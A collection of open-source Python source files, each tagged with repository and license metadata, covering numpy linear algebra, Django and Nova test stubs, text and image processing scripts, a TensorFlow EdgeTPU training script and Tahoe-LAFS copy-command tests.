return sqrt(add.reduce(s, axis=axis, keepdims=keepdims))
else:
try:
ord + 1
except TypeError:
raise ValueError("Invalid norm order for vectors.")
absx = abs(x)
absx **= ord
return add.reduce(absx, axis=axis, keepdims=keepdims) ** (1.0 / ord)
elif len(axis) == 2:
row_axis, col_axis = axis
row_axis = normalize_axis_index(row_axis, nd)
col_axis = normalize_axis_index(col_axis, nd)
if row_axis == col_axis:
raise ValueError('Duplicate axes given.')
if ord == 2:
ret = _multi_svd_norm(x, row_axis, col_axis, amax)
elif ord == -2:
ret = _multi_svd_norm(x, row_axis, col_axis, amin)
elif ord == 1:
if col_axis > row_axis:
col_axis -= 1
ret = add.reduce(abs(x), axis=row_axis).max(axis=col_axis)
elif ord == Inf:
if row_axis > col_axis:
row_axis -= 1
ret = add.reduce(abs(x), axis=col_axis).max(axis=row_axis)
elif ord == -1:
if col_axis > row_axis:
col_axis -= 1
ret = add.reduce(abs(x), axis=row_axis).min(axis=col_axis)
elif ord == -Inf:
if row_axis > col_axis:
row_axis -= 1
ret = add.reduce(abs(x), axis=col_axis).min(axis=row_axis)
elif ord in [None, 'fro', 'f']:
ret = sqrt(add.reduce((x.conj() * x).real, axis=axis))
elif ord == 'nuc':
ret = _multi_svd_norm(x, row_axis, col_axis, sum)
else:
raise ValueError("Invalid norm order for matrices.")
if keepdims:
ret_shape = list(x.shape)
ret_shape[axis[0]] = 1
ret_shape[axis[1]] = 1
ret = ret.reshape(ret_shape)
return ret
else:
raise ValueError("Improper number of dimensions to norm.")
# multi_dot
def multi_dot(arrays):
"""
Compute the dot product of two or more arrays in a single function call,
while automatically selecting the fastest evaluation order.
`multi_dot` chains `numpy.dot` and uses optimal parenthesization
of the matrices [1]_ [2]_. Depending on the shapes of the matrices,
this can speed up the multiplication a lot.
If the first argument is 1-D it is treated as a row vector.
If the last argument is 1-D it is treated as a column vector.
The other arguments must be 2-D.
Think of `multi_dot` as::
def multi_dot(arrays): return functools.reduce(np.dot, arrays)
Parameters
----------
arrays : sequence of array_like
If the first argument is 1-D it is treated as row vector.
If the last argument is 1-D it is treated as column vector.
The other arguments must be 2-D.
Returns
-------
output : ndarray
Returns the dot product of the supplied arrays.
See Also
--------
dot : dot multiplication with two arguments.
References
----------
.. [1] Cormen, "Introduction to Algorithms", Chapter 15.2, p. 370-378
.. [2] http://en.wikipedia.org/wiki/Matrix_chain_multiplication
Examples
--------
`multi_dot` allows you to write::
>>> from numpy.linalg import multi_dot
>>> # Prepare some data
>>> A = np.random.random(10000, 100)
>>> B = np.random.random(100, 1000)
>>> C = np.random.random(1000, 5)
>>> D = np.random.random(5, 333)
>>> # the actual dot multiplication
>>> multi_dot([A, B, C, D])
instead of::
>>> np.dot(np.dot(np.dot(A, B), C), D)
>>> # or
>>> A.dot(B).dot(C).dot(D)
Notes
-----
The cost for a matrix multiplication can be calculated with the
following function::
def cost(A, B):
return A.shape[0] * A.shape[1] * B.shape[1]
Let's assume we have three matrices
:math:`A_{10x100}, B_{100x5}, C_{5x50}`.
The costs for the two different parenthesizations are as follows::
cost((AB)C) = 10*100*5 + 10*5*50 = 5000 + 2500 = 7500
cost(A(BC)) = 10*100*50 + 100*5*50 = 50000 + 25000 = 75000
"""
n = len(arrays)
# optimization only makes sense for len(arrays) > 2
if n < 2:
raise ValueError("Expecting at least two arrays.")
elif n == 2:
return dot(arrays[0], arrays[1])
arrays = [asanyarray(a) for a in arrays]
# save original ndim to reshape the result array into the proper form later
ndim_first, ndim_last = arrays[0].ndim, arrays[-1].ndim
# Explicitly convert vectors to 2D arrays to keep the logic of the internal
# _multi_dot_* functions as simple as possible.
if arrays[0].ndim == 1:
arrays[0] = atleast_2d(arrays[0])
if arrays[-1].ndim == 1:
arrays[-1] = atleast_2d(arrays[-1]).T
_assertRank2(*arrays)
# _multi_dot_three is much faster than _multi_dot_matrix_chain_order
if n == 3:
result = _multi_dot_three(arrays[0], arrays[1], arrays[2])
else:
order = _multi_dot_matrix_chain_order(arrays)
result = _multi_dot(arrays, order, 0, n - 1)
# return proper shape
if ndim_first == 1 and ndim_last == 1:
return result[0, 0] # scalar
elif ndim_first == 1 or ndim_last == 1:
return result.ravel() # 1-D
else:
return result
def _multi_dot_three(A, B, C):
"""
Find the best order for three arrays and do the multiplication.
For three arguments `_multi_dot_three` is approximately 15 times faster
than `_multi_dot_matrix_chain_order`
"""
a0, a1b0 = A.shape
b1c0, c1 = C.shape
# cost1 = cost((AB)C) = a0*a1b0*b1c0 + a0*b1c0*c1
cost1 = a0 * b1c0 * (a1b0 + c1)
# cost2 = cost(A(BC)) = a1b0*b1c0*c1 + a0*a1b0*c1
cost2 = a1b0 * c1 * (a0 + b1c0)
if cost1 < cost2:
return dot(dot(A, B), C)
else:
return dot(A, dot(B, C))
def _multi_dot_matrix_chain_order(arrays, return_costs=False):
"""
Return a np.array that encodes the optimal order of mutiplications.
The optimal order array is then used by `_multi_dot()` to do the
multiplication.
Also return the cost matrix if `return_costs` is `True`
The implementation CLOSELY follows Cormen, "Introduction to Algorithms",
Chapter 15.2, p. 370-378. Note that Cormen uses 1-based indices.
cost[i, j] = min([
cost[prefix] + cost[suffix] + cost_mult(prefix, suffix)
for k in range(i, j)])
"""
n = len(arrays)
# p stores the dimensions of the matrices
# Example for p: A_{10x100}, B_{100x5}, C_{5x50} --> p = [10, 100, 5, 50]
p = [a.shape[0] for a in arrays] + [arrays[-1].shape[1]]
# m is a matrix of costs of the subproblems
# m[i,j]: min number of scalar multiplications needed to compute A_{i..j}
m = zeros((n, n), dtype=double)
# s is the actual ordering
# s[i, j] is the value of k at which we split the product A_i..A_j
s = empty((n, n), dtype=intp)
for l in range(1, n):
for i in range(n - l):
j = i + l
m[i, j] = Inf
for k in range(i, j):
q = m[i, k] + m[k+1, j] + p[i]*p[k+1]*p[j+1]
if q < m[i, j]:
m[i, j] = q
s[i, j] = k # Note that Cormen uses 1-based index
return (s, m) if return_costs else s
def _multi_dot(arrays, order, i, j):
"""Actually do the multiplication with the given order."""
if i == j:
return arrays[i]
else:
return dot(_multi_dot(arrays, order, i, order[i, j]),
_multi_dot(arrays, order, order[i, j] + 1, j))
| b-carter/numpy | numpy/linalg/linalg.py | Python | bsd-3-clause | 77,776 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('annotation', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='annotation',
options={'ordering': ('created',)},
),
]
| PsypherPunk/django-annotations | annotation/migrations/0002_auto_20160129_1311.py | Python | apache-2.0 | 369 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "edjango.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| sarusso/eDjango | manage.py | Python | apache-2.0 | 250 |
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Stubouts for the test suite
"""
import contextlib
import mock
from nova.virt.vmwareapi import driver
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import fake
from nova.virt.vmwareapi import network_util
from nova.virt.vmwareapi import vmware_images
def fake_get_vim_object(arg):
"""Stubs out the VMwareAPISession's get_vim_object method."""
return fake.FakeVim()
def fake_is_vim_object(arg, module):
"""Stubs out the VMwareAPISession's is_vim_object method."""
return isinstance(module, fake.FakeVim)
def fake_temp_method_exception():
raise error_util.VimFaultException(
[error_util.NOT_AUTHENTICATED],
"Session Empty/Not Authenticated")
def fake_temp_session_exception():
raise error_util.SessionConnectionException("it's a fake!",
"Session Exception")
def fake_session_file_exception():
fault_list = [error_util.FILE_ALREADY_EXISTS]
raise error_util.VimFaultException(fault_list, 'fake')
def fake_session_permission_exception():
fault_list = [error_util.NO_PERMISSION]
fault_string = 'Permission to perform this operation was denied.'
details = {'privilegeId': 'Resource.AssignVMToPool', 'object': 'domain-c7'}
raise error_util.VimFaultException(fault_list, fault_string, details)
def set_stubs(stubs):
"""Set the stubs."""
stubs.Set(network_util, 'get_network_with_the_name',
fake.fake_get_network)
stubs.Set(vmware_images, 'fetch_image', fake.fake_fetch_image)
stubs.Set(vmware_images, 'get_vmdk_size_and_properties',
fake.fake_get_vmdk_size_and_properties)
stubs.Set(vmware_images, 'upload_image', fake.fake_upload_image)
stubs.Set(driver.VMwareAPISession, "_get_vim_object",
fake_get_vim_object)
stubs.Set(driver.VMwareAPISession, "_is_vim_object",
fake_is_vim_object)
def fake_suds_context(calls={}):
"""Generate a suds client which automatically mocks all SOAP method calls.
Calls are stored in <calls>, indexed by the name of the call. If you need
to mock the behaviour of specific API calls you can pre-populate <calls>
with appropriate Mock objects.
"""
class fake_factory:
def create(self, name):
return mock.NonCallableMagicMock(name=name)
class fake_service:
def __getattr__(self, attr_name):
if attr_name in calls:
return calls[attr_name]
mock_call = mock.MagicMock(name=attr_name)
calls[attr_name] = mock_call
return mock_call
class fake_client:
def __init__(self, wdsl_url, **kwargs):
self.service = fake_service()
self.factory = fake_factory()
return contextlib.nested(
mock.patch('suds.client.Client', fake_client),
# As we're not connecting to a real host there's no need to wait
# between retries
mock.patch.object(driver, 'TIME_BETWEEN_API_CALL_RETRIES', 0)
)
| nkrinner/nova | nova/tests/virt/vmwareapi/stubs.py | Python | apache-2.0 | 3,654 |
#-*- coding: UTF-8 -*-
from PIL import Image, ImageDraw, ImageFont
#第 0000 题:将你的 QQ 头像(或者微博头像)右上角加上红色的数字,类似于微信未读信息数量那种提示效果。 类似于图中效果
def add_num(image_file_path, num, fill, font_name):
im = Image.open(image_file_path)
x_size, y_size = im.size
draw = ImageDraw.Draw(im)
text = str(num)
font = ImageFont.truetype(font_name, x_size // 3)
draw.text((y_size // 5 * 4, 0), text, fill, font)
im.save("result.jpg")
if __name__ == '__main__':
image_path = 'image.png'
fill_num = 3
fill_color = (255, 0, 255)
fill_font = "C:/windows/fonts/Arial.ttf"
add_num(image_path, fill_num, fill_color, fill_font)
| zhangmianhongni/MyPractice | Python/Python 练习册(show-me-the-code)/0000/0000.py | Python | apache-2.0 | 748 |
import logging, gensim, pickle, re
from gensim import corpora,models
from nltk.corpus import stopwords
import nltk
from nltk.stem.lancaster import LancasterStemmer
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from gensim import corpora,models, similarities
pronounlist = ['he','she','his','her','him','they','their','them','it','its','we','our','us','you','your']
with open('user_input_v1.txt') as f:
documents = f.readlines()
stoplist = [stopwords.words('english'),'d','dd','ddd','dddd']
print stoplist
#texts =[[word for word in ' '.join(document).lower().split() if word not in stoplist] for document in documents]
with open('contraction.pkl') as f:
contractions = pickle.load(f)
texts_stemmed = []
texts_all = []
n_pronoun = []
n_word = []
for document in documents:
print document
n_word_i = 0
n_pronoun_i =0
texts_stemmed = []
for text in document.split():
text = re.sub('[?!,.]', ' ', text)
text = text.lower()
n_word.append(len(text))
#text = LancasterStemmer().stem(text)
#texts_stemmed.append(text)
if text in contractions.keys():
text = contractions[text].split()
print text
if type(text) is list:
for text_i in text:
if text_i not in stoplist:
texts_stemmed.append(text_i)
if text_i in pronounlist:
n_pronoun_i = n_pronoun_i + 1
else:
if text not in stoplist:
texts_stemmed.append(text)
if text in pronounlist:
n_pronoun_i = n_pronoun_i + 1
else:
if text not in stoplist:
texts_stemmed.append(text)
if text in pronounlist:
n_pronoun_i = n_pronoun_i +1
n_pronoun.append(n_pronoun_i)
print "this is one document"
texts_all.append(texts_stemmed)
print "pronoun percentage"
print sum(n_pronoun)
print sum(n_word)
print float(sum(n_pronoun))/float(sum(n_word))
print 'this is the texts_all'
fdist = nltk.FreqDist([item for sublist in texts_all for item in sublist])
print fdist.most_common(50)
with open('texts_all.txt','w') as f:
for texts in texts_all:
f.write( ' '.join(texts) +'\n')
# here let us try, if we git rid of all the usual words shown
freqwordlist = ['hello','favorite','sure','like','what','think','know','do','hi']
text_all_nf =[]
for text_all_i in texts_all:
#print text_all_i
#if text_all_i.find(' '):
#text = text_all_i.split()
text_filter = [w for w in text_all_i if not w in freqwordlist]
text_all_nf.append(text_filter)
#dictionary = corpora.Dictionary(texts_all)
dictionary = corpora.Dictionary(text_all_nf)
print "we are printing the dictionary"
print dictionary
dictionary.save('user_input.dict')
new_doc = "i like to watch movies"
new_vec = dictionary.doc2bow(new_doc.lower().split())
print "we are printing the new vec"
print(new_vec)
corpus = [dictionary.doc2bow(text) for text in text_all_nf]
corpora.MmCorpus.serialize('user_input.mm',corpus)
id2word = dictionary
mm = corpus
#lda = gensim.models.ldamodel.LdaModel(corpus=mm,id2word = id2word,num_topics=10,update_every=0,chunksize=10, passes=20)
#lda.print_topics(10)
| leahrnh/ticktock_text_api | word2vec/user_input_word_all.py | Python | gpl-2.0 | 3,290 |
import socket
import sys
import time
from urlparse import urlparse
SCHEME_PORT_MAP = {'http': 80,
'https': 443}
def time_connect(url):
"""Return time in seconds to connect to socket of url,
or very large number if error in connection"""
parsed = urlparse(url)
if parsed.port:
port = parsed.port
else:
try:
port = SCHEME_PORT_MAP[parsed.scheme]
except IndexError:
raise Exception('url must specify port')
host = parsed.netloc.split(':')[0]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time_before = time.time()
try:
sock.connect((host, port))
except:
return sys.float_info.max
result = time.time() - time_before
sock.close()
return result
def fastest(urls):
"""Return (time, url) tuple of shortest time for all urls"""
return sorted([(time_connect(u), u) for u in urls])[0]
| quaddra/engage | python_pkg/engage/utils/socktime.py | Python | apache-2.0 | 934 |
#!/usr/bin/env python
import json, web, urllib2, re
db = json.load(open("db.access"))
db = web.database(dbn=str(db['type']), db=str(db['name']), user=str(db['user']), pw=str(db['pass']))
def build_rating_db():
debug = False
if debug: print "Processing account_27"
path = "http://raw2.github.com/Unthinkingbit/charity/master/account_27.csv"
response = urllib2.urlopen(path).read()
result = response.split('\n')
rater_lines = []
for row in result:
if "Rater" in row:
subrow = []
subrow.append(row.split(',')[0])
for item in row.split(','):
if "Rater" in item:
url = re.sub(r'^.*\(', "", item)
url = re.sub(r'\)$', "", url)
subrow.append(url)
rater_lines.append(subrow)
# 27 was a special case, after that it was different written
# get round number
if debug: print "Getting round off dvccountdown"
path = "http://dvccountdown.blisteringdevelopers.com"
result = urllib2.urlopen(path).read().split('\n')
startround = 28
endround = 28
for row in result:
if "<th>Round" in row:
endround = int(re.sub(r'^.*Round ', "", row)) + 1
break
if debug: print "startround: %d\tround received: %d" % (startround, endround)
for i in range(startround, endround):
if debug: print "Processing round %d" % i
path = "http://raw2.github.com/Unthinkingbit/charity/master/account_"+str(i)+".csv"
try:
result = urllib2.urlopen(path).read().split('\n')
for row in result:
if "Rating Comments" in row:
subrow = []
subrow.append(row.split(',')[0])
for item in row.split(','):
if "Rating Comments" in item:
url = re.sub(r'^.*\(', "", item)
url = re.sub(r'\)$', "", url)
subrow.append(url)
rater_lines.append(subrow)
except:
pass
if debug:
for row in rater_lines:
print row
if debug: print "Processing devtome rater_pages"
t = db.transaction()
try:
# first clear the database
db.query("delete from ratings")
for rater_page in rater_lines:
result = urllib2.urlopen(rater_page[1]).read().split('\n')
if debug: print "accessing %s" % rater_page[1]
for row in result:
if '<div class="li"><a href="http://devtome.com/doku.php?id=wiki:user:' in row:
# get author
author = re.sub(r'<li class="level[0,1]?"><div class="li"><a href="http://devtome.com/doku.php\?id=wiki:user:', '', row)
author = author.split('"')[0]
# get article_url
article_url = re.sub(r'^.*, <a href="http://devtome.com/doku.php\?id=', "http://devtome.com/doku.php?id=", row)
article_url = article_url.split('"')[0]
#create the author url
author_url = 'http://devtome.com/doku.php?id=wiki:user:'+author
# extract the rating
rating = re.sub(r'^.*</a>:[ ]*', "", row)
rating = re.sub(r'[ ]*</div>', "", rating)
rating = re.sub(r' - ', " ", rating)
rating = rating.split(" ", 1)
if len(rating) > 1: comment = rating[1]
else: comment = ""
rating = rating[0]
# store in db
db.query("insert into ratings (rater, rater_url, author_url, article_url, author, rating, comment) values ($rater, $rater_url, $author_url, $article_url, $author, $rating, $comment)", vars={'rater':rater_page[0], 'rater_url':rater_page[1], 'author_url':author_url, 'article_url':article_url, 'author':author, 'rating':rating, 'comment':comment})
except:
t.rollback()
raise
else:
t.commit()
def GetRatingsByAuthor(author):
ratings = []
try:
results = db.query('select * from ratings where author = $author', vars={'author':author})
for row in results:
ratings.append(row)
except:
ratings = []
raise
return ratings
if __name__ == "__main__":
# run the db_update
build_rating_db()
| hunterbunter/dvccountdown | modules/ratings.py | Python | gpl-3.0 | 3,672 |
foo = 23 + 3
foo = 4 + 5
foo = 4 + 5
foo = 4 + 5
foo = 4 + 5
i = i + 1
submitted += 1
x = x * 2 - 1
hypot2 = x * x + y * y
c = (a + b) * (a - b)
foo(bar, key='word', *args, **kwargs)
foo(bar, key='word', *args, **kwargs)
x = (3 +
2)
x = (3
+ 2)
x = 3 + \
2
x = 3 + \
2
def func(foo, bar='tester'):
return 5
def func(foo, bar='tester'):
return 5
baz(**kwargs)
negative = -1
spam(-1)
alpha[:-i]
if not -5 < x < +5:
pass
lambda *args, **kw: (args, kw)
lambda *args, **kw: (args, kw)
i = i + 1
submitted += 1
x = x * 2 - 1
hypot2 = x * x + y * y
c = (a + b) * (a - b)
c = alpha - 4
z = x ** y
| michaelBenin/pep8ify | tests/fixtures/whitespace_around_operator/whitespace_around_operator1_out.py | Python | apache-2.0 | 627 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tflite_runtime.interpreter import load_delegate
from tflite_runtime.interpreter import Interpreter
import glob
import os
import subprocess
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.preprocessing.image import ImageDataGenerator
input_size = (224, 224)
input_shape = (224, 224, 3)
batch_size = 1
###########################################################################################
# Load pretrained model
###########################################################################################
base_model = tf.keras.applications.MobileNetV2(input_shape=input_shape,
include_top=False,
classifier_activation='softmax',
weights='imagenet')
# Freeze first 100 layers
base_model.trainable = True
for layer in base_model.layers[:100]:
layer.trainable = False
model = tf.keras.Sequential([
base_model,
tf.keras.layers.Conv2D(filters=32, kernel_size=3, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.GlobalAveragePooling2D(),
tf.keras.layers.Dense(units=2, activation='softmax')
])
model.compile(loss='categorical_crossentropy',
optimizer=tf.keras.optimizers.RMSprop(lr=1e-5),
metrics=['accuracy'])
print(model.summary())
###########################################################################################
# Prepare Datasets
###########################################################################################
train_datagen = ImageDataGenerator(rescale=1./255,
zoom_range=0.3,
rotation_range=50,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
val_datagen = ImageDataGenerator(rescale=1./255)
dataset_path = './dataset'
train_set_path = os.path.join(dataset_path, 'train')
val_set_path = os.path.join(dataset_path, 'test')
batch_size = 64
train_generator = train_datagen.flow_from_directory(train_set_path,
target_size=input_size,
batch_size=batch_size,
class_mode='categorical')
val_generator = val_datagen.flow_from_directory(val_set_path,
target_size=input_size,
batch_size=batch_size,
class_mode='categorical')
epochs = 15
history = model.fit(train_generator,
steps_per_epoch=train_generator.n // batch_size,
epochs=epochs,
validation_data=val_generator,
validation_steps=val_generator.n // batch_size,
verbose=1)
###########################################################################################
# Plotting Train Data
###########################################################################################
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
plt.figure(figsize=(8, 8))
plt.subplot(2, 1, 1)
plt.plot(acc, label='Training Accuracy')
plt.plot(val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.ylabel('Accuracy')
plt.ylim([min(plt.ylim()), 1])
plt.title('Training and Validation Accuracy')
plt.subplot(2, 1, 2)
plt.plot(loss, label='Training Loss')
plt.plot(val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.ylabel('Cross Entropy')
plt.ylim([0, 1.0])
plt.title('Training and Validation Loss')
plt.xlabel('epoch')
# plt.show()
plt.savefig('history.png')
###########################################################################################
# Post Training Quantization
###########################################################################################
def representative_data_gen():
dataset_list = tf.data.Dataset.list_files('./dataset/test/*/*')
for i in range(100):
image = next(iter(dataset_list))
image = tf.io.read_file(image)
image = tf.io.decode_jpeg(image, channels=3)
image = tf.image.resize(image, input_size)
image = tf.cast(image / 255., tf.float32)
image = tf.expand_dims(image, 0)
yield [image]
model.input.set_shape((1,) + model.input.shape[1:])
converter = tf.lite.TFLiteConverter.from_keras_model(model)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_data_gen
converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]
converter.target_spec.supported_types = [tf.int8]
converter.inference_input_type = tf.uint8
converter.inference_output_type = tf.uint8
tflite_model = converter.convert()
###########################################################################################
# Saving models
###########################################################################################
model.save('classifier.h5')
with open('classifier.tflite', 'wb') as f:
f.write(tflite_model)
###########################################################################################
# Evaluating h5
###########################################################################################
batch_images, batch_labels = next(val_generator)
labels = '\n'.join(sorted(train_generator.class_indices.keys()))
with open('classifier_labels.txt', 'w') as f:
f.write(labels)
logits = model(batch_images)
prediction = np.argmax(logits, axis=1)
truth = np.argmax(batch_labels, axis=1)
keras_accuracy = tf.keras.metrics.Accuracy()
keras_accuracy(prediction, truth)
###########################################################################################
# Evaluating tflite
###########################################################################################
def set_input_tensor(interpreter, input):
input_details = interpreter.get_input_details()[0]
tensor_index = input_details['index']
input_tensor = interpreter.tensor(tensor_index)()[0]
scale, zero_point = input_details['quantization']
input_tensor[:, :] = np.uint8(input / scale + zero_point)
def classify_image(interpreter, input):
set_input_tensor(interpreter, input)
interpreter.invoke()
output_details = interpreter.get_output_details()[0]
output = interpreter.get_tensor(output_details['index'])
scale, zero_point = output_details['quantization']
output = scale * (output - zero_point)
top_1 = np.argmax(output)
return top_1
interpreter = tf.lite.Interpreter('classifier.tflite')
interpreter.allocate_tensors()
# Collect all inference predictions in a list
batch_prediction = []
batch_truth = np.argmax(batch_labels, axis=1)
for i in range(len(batch_images)):
prediction = classify_image(interpreter, batch_images[i])
batch_prediction.append(prediction)
# Compare all predictions to the ground truth
tflite_accuracy = tf.keras.metrics.Accuracy()
tflite_accuracy(batch_prediction, batch_truth)
###########################################################################################
# Compiles model
###########################################################################################
subprocess.call(["edgetpu_compiler",
"--show_operations",
"classifier.tflite"])
###########################################################################################
# Evaluating tflite
###########################################################################################
interpreter = Interpreter('classifier_edgetpu.tflite', experimental_delegates=[
load_delegate('libedgetpu.so.1.0')])
interpreter.allocate_tensors()
# Collect all inference predictions in a list
batch_prediction = []
batch_truth = np.argmax(batch_labels, axis=1)
for i in range(len(batch_images)):
prediction = classify_image(interpreter, batch_images[i])
batch_prediction.append(prediction)
# Compare all predictions to the ground truth
edgetpu_tflite_accuracy = tf.keras.metrics.Accuracy()
edgetpu_tflite_accuracy(batch_prediction, batch_truth)
###########################################################################################
# Show Results
###########################################################################################
print("Raw model accuracy: {:.2%}".format(keras_accuracy.result()))
print("Quant TF Lite accuracy: {:.2%}".format(tflite_accuracy.result()))
print("EdgeTpu Quant TF Lite accuracy: {:.2%}".format(
edgetpu_tflite_accuracy.result()))
| google-coral/demo-manufacturing | models/retraining/train_classifier.py | Python | apache-2.0 | 9,469 |
# Copyright 2016 Leon Poon and Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from xml.dom import minidom
from test import res
dtsx_res = res.pydtsxplode.dtsx # @UndefinedVariable
class TestXml(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testMakeXmlNs(self):
pass
def testReadPackage(self):
f = dtsx_res['Package.dtsx']('rb')
dom = minidom.parse(f)
self.assertIs(dom.documentElement.ownerDocument, dom)
self.assertIs(dom.documentElement.parentNode, dom)
if __name__ == "__main__":
unittest.main()
| LeonPoon/XMLExplode | src-test/test/xmlxplode/test_xml_walk.py | Python | apache-2.0 | 1,191 |
import os.path, simplejson
from twisted.trial import unittest
from twisted.python import usage
from twisted.internet import defer
from allmydata.scripts import cli
from allmydata.util import fileutil
from allmydata.util.encodingutil import (quote_output, get_io_encoding,
unicode_to_output, to_str)
from allmydata.util.assertutil import _assert
from .no_network import GridTestMixin
from .test_cli import CLITestMixin
timeout = 480 # deep_check takes 360s on Zandr's linksys box, others take > 240s
class Cp(GridTestMixin, CLITestMixin, unittest.TestCase):
def test_not_enough_args(self):
o = cli.CpOptions()
self.failUnlessRaises(usage.UsageError,
o.parseOptions, ["onearg"])
def test_unicode_filename(self):
self.basedir = "cli/Cp/unicode_filename"
fn1 = os.path.join(unicode(self.basedir), u"\u00C4rtonwall")
try:
fn1_arg = fn1.encode(get_io_encoding())
artonwall_arg = u"\u00C4rtonwall".encode(get_io_encoding())
except UnicodeEncodeError:
raise unittest.SkipTest("A non-ASCII command argument could not be encoded on this platform.")
self.skip_if_cannot_represent_filename(fn1)
self.set_up_grid()
DATA1 = "unicode file content"
fileutil.write(fn1, DATA1)
fn2 = os.path.join(self.basedir, "Metallica")
DATA2 = "non-unicode file content"
fileutil.write(fn2, DATA2)
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda res: self.do_cli("cp", fn1_arg, "tahoe:"))
d.addCallback(lambda res: self.do_cli("get", "tahoe:" + artonwall_arg))
d.addCallback(lambda (rc,out,err): self.failUnlessReallyEqual(out, DATA1))
d.addCallback(lambda res: self.do_cli("cp", fn2, "tahoe:"))
d.addCallback(lambda res: self.do_cli("get", "tahoe:Metallica"))
d.addCallback(lambda (rc,out,err): self.failUnlessReallyEqual(out, DATA2))
d.addCallback(lambda res: self.do_cli("ls", "tahoe:"))
def _check((rc, out, err)):
try:
unicode_to_output(u"\u00C4rtonwall")
except UnicodeEncodeError:
self.failUnlessReallyEqual(rc, 1)
self.failUnlessReallyEqual(out, "Metallica\n")
self.failUnlessIn(quote_output(u"\u00C4rtonwall"), err)
self.failUnlessIn("files whose names could not be converted", err)
else:
self.failUnlessReallyEqual(rc, 0)
self.failUnlessReallyEqual(out.decode(get_io_encoding()), u"Metallica\n\u00C4rtonwall\n")
self.failUnlessReallyEqual(err, "")
d.addCallback(_check)
return d
def test_dangling_symlink_vs_recursion(self):
if not hasattr(os, 'symlink'):
raise unittest.SkipTest("Symlinks are not supported by Python on this platform.")
# cp -r on a directory containing a dangling symlink shouldn't assert
self.basedir = "cli/Cp/dangling_symlink_vs_recursion"
self.set_up_grid()
dn = os.path.join(self.basedir, "dir")
os.mkdir(dn)
fn = os.path.join(dn, "Fakebandica")
ln = os.path.join(dn, "link")
os.symlink(fn, ln)
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda res: self.do_cli("cp", "--recursive",
dn, "tahoe:"))
return d
def test_copy_using_filecap(self):
self.basedir = "cli/Cp/test_copy_using_filecap"
self.set_up_grid()
outdir = os.path.join(self.basedir, "outdir")
os.mkdir(outdir)
fn1 = os.path.join(self.basedir, "Metallica")
fn2 = os.path.join(outdir, "Not Metallica")
fn3 = os.path.join(outdir, "test2")
DATA1 = "puppies" * 10000
fileutil.write(fn1, DATA1)
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ign: self.do_cli("put", fn1))
def _put_file((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
self.failUnlessIn("200 OK", err)
# keep track of the filecap
self.filecap = out.strip()
d.addCallback(_put_file)
# Let's try copying this to the disk using the filecap.
d.addCallback(lambda ign: self.do_cli("cp", self.filecap, fn2))
def _copy_file((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
results = fileutil.read(fn2)
self.failUnlessReallyEqual(results, DATA1)
d.addCallback(_copy_file)
# Test copying a filecap to local dir, which should fail without a
# destination filename (#761).
d.addCallback(lambda ign: self.do_cli("cp", self.filecap, outdir))
def _resp((rc, out, err)):
self.failUnlessReallyEqual(rc, 1)
self.failUnlessIn("when copying into a directory, all source files must have names, but",
err)
self.failUnlessReallyEqual(out, "")
d.addCallback(_resp)
# Create a directory, linked at tahoe:test .
d.addCallback(lambda ign: self.do_cli("mkdir", "tahoe:test"))
def _get_dir((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
self.dircap = out.strip()
d.addCallback(_get_dir)
# Upload a file to the directory.
d.addCallback(lambda ign:
self.do_cli("put", fn1, "tahoe:test/test_file"))
d.addCallback(lambda (rc, out, err): self.failUnlessReallyEqual(rc, 0))
# Copying DIRCAP/filename to a local dir should work, because the
# destination filename can be inferred.
d.addCallback(lambda ign:
self.do_cli("cp", self.dircap + "/test_file", outdir))
def _get_resp((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
results = fileutil.read(os.path.join(outdir, "test_file"))
self.failUnlessReallyEqual(results, DATA1)
